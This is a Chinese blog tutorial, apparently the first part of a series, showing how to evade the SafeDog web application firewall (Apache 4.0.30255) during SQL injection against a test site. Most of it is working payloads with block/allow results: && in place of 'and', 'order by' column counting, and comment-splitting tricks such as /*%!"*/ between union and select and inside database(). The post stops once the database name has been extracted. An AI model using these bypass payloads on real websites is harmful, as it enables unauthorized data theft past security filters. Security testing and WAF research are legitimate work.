绕过安全狗(Apache 4.0.30255)——SQL注入(上)

先给网站装上安全狗(Apache 4.0.30255)
在这里插入图片描述

首先测试是否是注入点
在这里插入图片描述
这里应该是and被过滤了
在这里插入图片描述
尝试用大小写与双写都不行,想想也是,安全狗也没那么笨
然后尝试用&&代替and
在这里插入图片描述
在这里插入图片描述
于是乎就成功判断出注入点咯,接下来order by判断列数

1'  order by 3#

在这里插入图片描述
判断为2列,union联合注入查询咯

1' union select 1,2#

在这里插入图片描述
在这里插入图片描述
被拦截了奥,现在需要找到是什么函数被拦截了

1' union #            不拦截
1' select 1,2#       不拦截
1' union z select 1,2#  不拦截
1' union select 1,2#     拦截

可以发现只有当union与select连在一起出现时才会拦截,所以可以考虑通过注释符来干扰安全狗的识别

1' union/**/select 1,2#            拦截
尝试一下内联注入
1'/*!union*/select 1,2#            拦截
1'/*!union/*!/**//*!select*/1,2#   拦截
尝试一下在注释符中插入特殊符号 
1' union /*%!"*/select 1,2#      不拦截

在这里插入图片描述
可以愉快地注入了,在本次注入中有遇到相连函数拦截的就可以用/%!"/ 来绕过。
查看一下用的什么数据库,

1' union /*%!"*/select  /*%!"*/1,database()#  拦截

应该是database()被拦截了,试试注释符拆分他

1' union /*%!"*/select  /*%!"*/1,database/**/()#  不拦截

在这里插入图片描述
成功注入得到数据库名了,咱先告一段落,剩下的下期再讲。

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值